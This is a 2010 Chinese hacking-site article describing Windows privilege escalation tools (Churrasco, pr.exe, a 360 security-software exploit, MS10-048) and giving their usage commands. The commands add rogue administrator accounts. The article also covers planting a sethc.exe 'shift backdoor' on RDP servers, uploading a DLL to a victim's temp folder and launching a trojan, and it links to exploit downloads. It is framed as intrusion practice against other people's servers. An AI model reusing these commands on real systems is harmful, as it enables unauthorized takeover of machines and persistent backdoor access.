首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
常用的Churrasco,pr,ms10048,360提权利用程序介绍演示
来源:http://hi.baidu.com/5427518/blog 作者:qing 发布时间:2010-11-15  

1.Churrasco.exe,是win2003 系统下的一个本地提权0day,通过此工具执行命令即可添加管理用户。

使用方法:

Churrasco.exe "net user hackqing 5427518 /add && net localgroup administrators hackqing /add"

2.pr.exe 提权Windows跟踪注册表项的ACL权限提升漏洞
Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM级的权限提升。

使用方法:

pr.exe “gets.exe $local”

pr.exe “net user admin admin /add & net localgroup administrators admin /add”

以上提权实战教程下载

http://down.qiannao.com/space/file/yulegu/share/2010/10/3/-793a-8303-4e0bxxoo-ff08pr-ff09-63d0-6743-548cChurrasco-ff08-6263-8089-ff09-63d0-6743.rar/.page

动画制作:hackqing

3.360提权

360本地提权漏洞利用工具  


360.exe 要劫持的程序名 要运行的程序全路径 [BREGDLL.dll的全路径]

解释一下吧:第三个参数BREGDLL.dll是可选参数,提供BREGDLL.dll这个文件的路径。因为有时候虽然漏洞没有被补上但360目录没有权限访问会导致提权失败。这时候就可以上传一个BREGDLL.dll到服务器上,然后把路径填到第三个参数那里。

比如对方开了3389,那你就可以劫持sethc.exe 来做一个shift后门。

360.exe "sethc.exe" "cmd.exe"

如果360所在目录无权访问,那么我们就上传一个BREGDLL.dll到对方c:\windows\temp\BREGDLL.dll

然后执行

360.exe "sethc.exe" "cmd.exe" "c:\windows\temp\BREGDLL.dll"

如果提示成功一个shift后门就被创建了,3389上去我就不说了

动画演示:http://www.51chi.net/sysexp/360.gif


4.ms10048提权

Windows中的win32k.sys内核驱动中的xxxCreateWindowEx函数在处理某些回调参数时存在内核级权限提升漏洞。在正常情况下从用户空间调用CreateWindow时,会执行NtUserCreateWindowEx内核函数,xxxCreateWindowEx位于内核端调用栈上的临近位置。之后的函数会检查回调函数(或钩子)并调用xxxCallHook将注册的回调函数分发到用户空间。
用于将参数传送回创建窗口的进程的机制存在漏洞。这些参数通过栈传送到了用户空间,并在执行了回调函数后被内核重用。如果回调函数将hParent参数重置为类似于0xffffffff或0xfffffffe的伪句柄值,内核就会崩溃。

成功利用这个漏洞的攻击者可以执行任意内核态代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

使用方法:

USE MS10048.EXE NET USER XX XX /ADD
USE MS10048.EXE MUMA.EXE

第一个是X64位,第二个是X86




利用程序请到网络上去下载



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·Cisco Router Backdoor -- TCL S
·记星外主机提权的曲折过程
·入侵成人用品购物网站
·DB-OWNER权限日志备份专用一句话
·mssql数据库注入时exec xp_cmdsh
·一次欺骗带来的血案--入侵实录
·upfile 突破
·google hack渗透全过程
·典型性社会工程学渗透实战(图文
·艰难渗透源码出售站点(图文)
·社会工程+老式提权艰难渗透某通
·对搜狐、网易和TOM三大门户网站
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved